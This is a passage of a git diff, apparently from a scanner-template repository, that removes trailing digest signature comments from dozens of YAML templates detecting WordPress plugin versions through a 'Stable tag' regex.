a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index 7e5f1ed08d..df3c5f3a94 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201debc738b6fd8286d73300fd6c8bd5f536f6e110dc630b669c027c1cfb4e05170221008e5c9d44f3228fdc376fa7d20de6be84827def5b1805d0beea22432f2c02cca9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 8026f0dee7..6a50e049dc 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205a7697db072e47a90e612d2108e7f8559af5bcd2e45affe9f5e8b2ff793031bd02207b25db658c52b6482434d2744c5a748cd1cb7336f6beb81f0e5832815311eea1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 4ac875fc12..e532694167 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220589039c78bdf09fa28e55a04a1015a60e90bf3b01382de6fe14691b9b70a3c97022100fa68a619a474b6b3393f947ca43f44220308bb1c85603b4c2fceb9335c90d08d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 3c0cca9684..4c6e616c1d 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022053a49a60a2f77a4cf1bf8478f1a0b814bff9b04bd8f4d2a3604d135143c7ff4e02210094819abca579cdf73f82ab628c88329297039f8f9c905da21cc447d468e7fb31:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index c27150055d..a70a58690c 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220666ba5174298af93388599cb9cae4ce69f6d1dbbaa4fe92399ad074d81644cef0220501747e1baecdd60a04677fd574d5028b35862619491dbaa5f0ffdca42580c77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 3975ba0bb5..4e3c68c53a 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220276f9da791fd657e6b41425e7e85a314d8c68300ed1d064ee3b7a6e04ea98b1b022100a2b1e889ec22006e9be066cf5f271f852e8d3fda65f4c2fd64dbdbce81765901:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index 7f77cb3c85..0cd866179e 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b7c6ad065b23740ba64a0e27f4b06d1c4095636df3e09b32b8215b74302bfe5c022068b22709c424db0496f13918909f30e480bc7caee123194754f9c50357553518:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index ee69769a59..b1d8479d13 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201b731cd043cb0fbcba74f205d82034dd14df5605da99b7897c67103d0e31f22a02207719e8a3bb05ac74bfe8b966882d47fb960dc37334a2bf053ac685e764f14b34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 27d63701f4..04e090313f 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201d8dead2bc601192c24d9c2ede3d2fb03a1c09147f07516399bf21d0e68217c1022100ccd63e6d3917a7b403782d0932bf9a41b7c8141c3a13c36e7a556a93cb7e8aac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 128303a660..57e618924b 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cba9149fbf638f55273fb9f438dd05d8a17a7c2e5de2a177534999b631da451a022100bb6370126efd8cb3a7de87e20ec571051502203751fdc8e7ad3161ca834683d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index a906f2d5f4..571b3b20a3 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022005d26695f69bb1ee0e50cfdc7bc87e8ac3117ccb884b91366f11c2b9746d864a02207b66a512f6b409890a65fb51acb5382a56f38f0a792f096b84dfbddb95029165:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index fbf877d69e..4d562316b4 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202841f9f5c94621b13e202f726893c618d4e12eb138b7f718f0649db633046a18022100c6bcde153e8a781dd53cf2301d24f0c3b8471342cbca59c03a8a3b534dcaa27b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index 84639211bc..dcea952545 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200dc6fa8d891ab7fc5a273e87862d1aee298d4f3e1ccc0a408d99a68736a65e6d02205d656cbe030bf04467dbd77ee8a8c46cf805ad31e1a4b7066f512142d413bcf0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 7453312823..0ae2f18122 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c0fce00127d588c0d6a40139ecb1fb58d9ff30fbd8b86082bd13512127f050f4022100d72438a560a045d07815bdbebf43e7fe4f048dd949cf741a01d8ea676b43ce92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 1ac38312bb..12f549d536 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100df3c3e90dfe639337399e02b958ed2702c438ee454b69f5a12c5934194986137022100922fbebd5b6ef4b98bcb0a36065349acfa52926f759e91b666ecec7461736392:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 21aa114abd..d8ea6a72f1 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ce4ddbebe1ec084c1f1c337717b48e0cb1e75ebcc2102e4f51c7b70024108efd022100ff5883a5d2d37bc70eae53087a1a8f9226ef60bc32d135a046a940ac89377364:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 676360d979..4afaf9dc97 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022035ed67612d0a22597366d1577577dcd21d28ad6590d311a25d45eadef5913847022039793cb9be643caa415f1371fb7155c701fa43051b7c94a4665c4ffb20b686e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 735da3fcc6..88fea67f93 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220620ff17ebb78a0bdd73e014c65625b8a58647c16abac3af5623deb1b0f81aa01022100b45d16583f4d254a18ca04a45725b8498aee94d74b1da202e64099227d1029db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index 1572325291..d205cdbf36 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201815a06a9ecbfe3a476ccd69f674149661bb561cc4d20388f21f73948ce10fad022100aaaebf8f14591460bc57ad7d040135b41c42fc64b24da30a4d7af43b02823cdb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 836cbf81ed..3fa20df7d2 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a914d5711e3b6b7a4106a8f55b2d8d2c44b61cbc48f957c0d67a2f9a5f31b967022019c256e4e885d35bc3383c17e22898aadcc1f78c495024825090c5a3c275cc32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index 6417302e29..bcd63ced86 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022031458e4875dce1ff670f8555215d9edc4453f4d16e723d41106b5b39e3ba61ee022032c2a074a153e5b82b7f09e2281c850661e44fd43fe35ee36ea144eb7dc91a00:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index 75e666cfb4..bca0326f2b 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a97a8189b7dfdcd70eeae40c44df590b764be2da4e80199f2077b734a158b8bf022100907d142404dacb777c43415eeeddf4bb4abc81806125c35d2686630d96a7f91d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 8308f9b017..854328f04b 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bcfd909820b34100f9ad76be995fd62abb996a66f40f20ffa014765acc642945022100a9014d19b22aa91fbbc514ac79ec5a37d08213b5fb2407daffcd34a94de043d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index f5c34c4dcd..6d3f7f4566 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a07090668d156385677ffeaa709ef159a082b6f05ddd1fd9416f78d1eb02bc4502201094a5153f52285d5aeb5431626abb5a33da82cc3d06c73260366aeea8005e37:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index 6acdd602dc..a923d21a15 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206c296d7514ab69ac670cc628ac4ea7222c8c4061403a86711300224989a0ea1e02205029cc6b1cd0aa6247f9a71ae07d0b133b667af5c51bc063e9f7021aeef15875:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 721a88c53b..f10480fc8f 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c1e4529a1725feffd905af2f911fd5be9f8d815bbe69b3323e507efedfd44a95022100813f13b056f51d753581318a9237e675aeacc78504d5a222281dce5094b57a56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 17469b40d6..6c92091767 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206e80f9f8558b0c62cd4c04162986ef87f494f557f7288956ef9ee01dac9cd7c002207a96b344bf70b50cdeace736ff542994578a3aac9cc50bef5604e646463c209f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 75eee2d046..b25c6c9a9c 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201f1e7d7438a54f766472b1ab46e2dc0b10fd77ac53c38ccd87c70379c9ce273c022100ac6ca445014daa87fd8eff68cb610a25368ba4f6d9fc3fea12d3accd36e02667:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index a161b027e7..1781172d05 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200beb5029c6026fa292fdd8a095e961e0ffee6a736f7ed1718a16154d376ca85e02207395699e861b4b524ef173caf45f33c409c0b2ec6bd4f0cc03222749aa2e0ee8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index ef7cee8e34..92c8ce3409 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b569fd5968d7c58ec55582bf5741071fed2c15d48fb120dee5d19f22b4fda44702200905ba6c53301aa43d79213c71c953dd252f4253449b56759e35bd29adee0d1a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index 036158fc0f..eea42ed8da 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210093d2208ebe70b60b0843485df1698bf351c4d3c2302eb862040a94fe1d2d1bdf0221008dccc25d6b310755f5b921cb47128affdc329f5fde8a4623635182f6aad6b209:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index 0ef7ece106..bedb85a0eb 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100978d30f3ac9ef3729290619b21d04442183f1aa2d3f87b1d45f6120a12813a3802201528fb834aa70441bfbe3bc14fa9be2eba1d9bc298c8916ff7b29b4253532299:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 4cd894f222..45bbbc71df 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022002786e3c15bf1859153f90a86132390694604551c4636ab83e22227e206a2f58022100f3b1d392335facf3dea583ecbaae0f22557c6a60989123c2bb4c9e3114f1cf02:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index a4358d18de..03befac73e 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d9ad2e61df8512a23aca23b424107b56d1de025e4200f908e05bcd8beb1e5680022100f21b6a8bc7e4ff5fac1e642e28302117c0f606d26ddd6aaa5d09773f62e9edfc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index 757f8f9585..e1f0093127 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f5fcc0480154083913fdbfae6e91bdd98b72a21bd5e6d4a44fb64ebdc61bbcf3022100ee1ee5ee834d2debce14924e469d24828e159e640c51f704fe0dddcbf5c5ff8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 505d0ef6a7..0db316d66d 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a3278806ec511ad6bbc08864d1771b72e720e4f6f9e9e4defdfa5ff60d6dfdfe02207a86b4348b116af4a70ebed5d055a8a2b3cc3f1a2d24e5e8d8a57d859aa348dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 9c72812962..135639253d 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100bcc35be7dfaa28bd16f129ecb3f78bde484781aeca4102adb72de488bf552308022049e06a494b1d46d6c50a972d5e52aa3637ed62690a80efb71e55c7a3e2c281d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index b56034d651..540fbaf9ac 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022058a025e2d2699b6c7fe94491e2283c042ac8c374bea62642f805f2e1964a908e022058019102f33cb82394e16f80df6aa4287d85f112ad841b4fa491aebf243b6556:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 5cb3f18926..7e71b4736f 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100941edd7c279575d7aaea5e287586f7c99d047c868039526e6dfbf2c2e532db8e02201fa6b8b9c60e941699aa3f2419f8d27fb27e67d2ed5effd8b3c2f8464e2a418d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 5e296a4e89..88a70b2478 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206b11fc46b001a341afb2decba0f1a9c9371f8873f869fa6288585d2636a7b3f3022100a7cc21c968b50e9fc5ad173e8ae07a841dd8a4f34656a40e4cc6bfd5d4594144:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index e480e2630d..fc498e67e6 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009b9919056b95c1e960d2007e49ed16620e0a34c1b2b05c38aaa1cd2c560cba6b0221009a6d06f1a4462649b9e42f9c67844c3383e5c61fdc1987fc7ba3236f2b06de55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 3336134e96..465aa93d57 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022047606f9c2da01c80605af6818d00bb1de68b7eaf5bf2d8192399a9ed4883e77f022100a4a399946abeea266db2cc401d9af6c86cc1b4844c5b16577361c5771cef7675:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 3a03ef7027..2a1b0e57a9 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022036e3aaf37f55861226f6cdfdb38d6af7e208a94e8de1185ec9e054d3580aa9c9022100b8ae5b5b28d07b87b96df71c7a7adb95bd65a8d601148f7bb9368c359abf55df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 4278a63771..df35e8b415 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204d3d91eb685904e78f0bea9e3671b170ee44c8e372be306eb8b1296f761c631c022027a8678b58292dad261408cc40837f5b0578c0b949140aaa86931cb3784fb9d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 687b3a176a..033cc4bc3d 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b03c8c4794ca592c20cb38f0a2643e46770e5301945b0be5a0311e845e1686d302201d3de361847d2ae30d9ed62aac56285e441d6a68444614a0c19bfbb615010f93:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluent-smtp.yaml b/http/technologies/wordpress/plugins/fluent-smtp.yaml index c528c69ce5..4a3dcbd210 100644 --- a/http/technologies/wordpress/plugins/fluent-smtp.yaml +++ b/http/technologies/wordpress/plugins/fluent-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204b067d481bd15652286123b66f51afeae277030022740f3aeb529d30719ddd5c0220470c096a49ede2a9ff9b6ad91b0ef14dc3bd21ee9015612ee81737a7dd739438:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index cee81131dc..945ab6ad03 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f80ea454d4da76ac45f00962134afaab99834d22d807f5ca2c392efc0df09595022100f321482de0c598946fdecab110117aa0bc6f0b3d4bc01bf1d87ac39b39e0e2f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml 